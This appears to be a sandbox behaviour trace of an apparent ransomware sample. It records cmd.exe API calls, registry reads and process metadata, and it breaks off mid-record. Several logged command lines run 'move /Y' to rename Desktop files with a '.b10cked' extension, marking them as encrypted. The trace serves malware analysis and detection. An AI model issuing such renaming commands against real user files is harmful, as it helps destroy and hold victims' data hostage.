RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e89c | out: phkResult=0x28e89c*=0x40) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x78, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x0, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegCloseKey (hKey=0x40) returned 0x0 [0220.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e89c | out: phkResult=0x28e89c*=0x40) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x40, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x0, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x9, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x9, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x9, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegCloseKey (hKey=0x40) returned 0x0 [0220.797] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.797] srand (_Seed=0x5b8863b6) [0220.797] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"" [0220.797] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"" [0220.798] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.798] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.798] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.798] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.798] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.798] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.798] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.798] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.798] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.798] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.798] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.798] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.798] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.798] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.799] GetEnvironmentStringsW () returned 0x3722a0* [0220.799] FreeEnvironmentStringsW (penv=0x3722a0) returned 1 [0220.799] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.799] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.799] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.799] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.799] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.799] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.799] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.799] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.799] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.799] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.799] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f668 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.799] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f668, lpFilePart=0x28f664 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f664*="Desktop") returned 0x18 [0220.799] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.799] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3e4 | out: lpFindFileData=0x28f3e4) returned 0x36ffe0 [0220.799] FindClose (in: hFindFile=0x36ffe0 | out: hFindFile=0x36ffe0) returned 1 [0220.800] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f3e4 | out: lpFindFileData=0x28f3e4) returned 0x36ffe0 [0220.800] FindClose (in: hFindFile=0x36ffe0 | out: hFindFile=0x36ffe0) returned 1 [0220.800] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f3e4 | out: lpFindFileData=0x28f3e4) returned 0x36ffe0 [0220.800] FindClose (in: hFindFile=0x36ffe0 | out: hFindFile=0x36ffe0) returned 1 [0220.800] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.800] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.800] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.800] GetEnvironmentStringsW () returned 0x372ac0* [0220.800] FreeEnvironmentStringsW (penv=0x372ac0) returned 1 [0220.800] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.801] GetConsoleOutputCP () returned 0x1b5 [0220.801] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.801] GetUserDefaultLCID () returned 0x409 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7a8, cchData=128 | out: lpLCData="0") returned 2 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7a8, cchData=128 | out: lpLCData="0") returned 2 [0220.801] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f7a8, cchData=128 | out: lpLCData="1") returned 2 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.802] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.802] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.803] GetConsoleTitleW (in: lpConsoleTitle=0x3608c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.803] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.803] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.803] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.803] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.804] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.804] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.804] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.804] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.804] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.804] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.804] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.807] GetConsoleTitleW (in: lpConsoleTitle=0x28f4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.807] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.807] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.807] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.807] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.807] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.807] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.808] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.808] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.808] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.808] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.808] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.808] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.808] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.808] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.808] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.808] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.808] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.808] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.808] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.808] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.808] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.808] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.808] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.808] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.808] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.808] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.810] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.810] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.810] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f25c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f254, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f254*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.810] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.811] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.811] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2=".") returned 8 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2="..") returned 8 [0220.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav")) returned 0x20 [0220.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.812] SetErrorMode (uMode=0x0) returned 0x0 [0220.812] SetErrorMode (uMode=0x1) returned 0x0 [0220.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", nBufferLength=0x104, lpBuffer=0x28ebe4, lpFilePart=0x28ebcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpFilePart=0x28ebcc*="6UVpef.wav") returned 0x23 [0220.812] SetErrorMode (uMode=0x0) returned 0x1 [0220.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2=".") returned 8 [0220.812] _wcsicmp (_String1="6UVpef.wav", _String2="..") returned 8 [0220.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav")) returned 0x20 [0220.812] SetErrorMode (uMode=0x0) returned 0x0 [0220.812] SetErrorMode (uMode=0x1) returned 0x0 [0220.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", nBufferLength=0x104, lpBuffer=0x28f060, lpFilePart=0x28edf8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpFilePart=0x28edf8*="6UVpef.wav") returned 0x23 [0220.812] SetErrorMode (uMode=0x0) returned 0x1 [0220.812] SetErrorMode (uMode=0x0) returned 0x0 [0220.813] SetErrorMode (uMode=0x1) returned 0x0 [0220.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", nBufferLength=0x104, lpBuffer=0x28f268, lpFilePart=0x28edf8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", lpFilePart=0x28edf8*="6UVpef.wav.b10cked") returned 0x2b [0220.813] SetErrorMode (uMode=0x0) returned 0x1 [0220.813] SetLastError (dwErrCode=0x0) [0220.813] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav.b10cked")) returned 0xffffffff [0220.813] GetLastError () returned 0x2 [0220.813] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", fInfoLevelId=0x1, lpFindFileData=0x28e774, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e774) returned 0x372198 [0220.813] FindNextFileW (in: hFindFile=0x372198, lpFindFileData=0x28e774 | out: lpFindFileData=0x28e774) returned 0 [0220.813] GetLastError () returned 0x12 [0220.813] FindClose (in: hFindFile=0x372198 | out: hFindFile=0x372198) returned 1 [0220.814] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", fInfoLevelId=0x1, lpFindFileData=0x371ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371ac8) returned 0x372198 [0220.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", nBufferLength=0x104, lpBuffer=0x28ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked", lpFilePart=0x0) returned 0x2b [0220.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", nBufferLength=0x104, lpBuffer=0x28ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpFilePart=0x0) returned 0x23 [0220.814] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav")) returned 0x20 [0220.814] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav.b10cked"), dwFlags=0x3) returned 1 [0220.815] FindClose (in: hFindFile=0x372198 | out: hFindFile=0x372198) returned 1 [0220.815] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e9c0 | out: _Buffer=" 1") returned 9 [0220.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.815] GetFileType (hFile=0x7) returned 0x2 [0222.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e94c | out: lpMode=0x28e94c) returned 1 [0222.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.932] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e980 | out: lpConsoleScreenBufferInfo=0x28e980) returned 1 [0222.932] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.933] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x28e9c0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.933] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e9a4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x28e9a4*=0x1a) returned 1 [0222.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.933] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.933] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.933] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.933] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.934] SetConsoleInputExeNameW () returned 0x1 [0222.934] GetConsoleOutputCP () returned 0x1b5 [0222.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.934] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.934] exit (_Code=0) Process: id = "572" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32894 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32895 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32896 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32897 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32898 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32899 start_va = 0x77230000 end_va = 